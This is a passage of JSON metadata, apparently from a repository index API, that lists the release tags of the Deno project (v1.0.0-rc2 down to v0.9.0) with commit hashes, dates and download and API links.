-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T1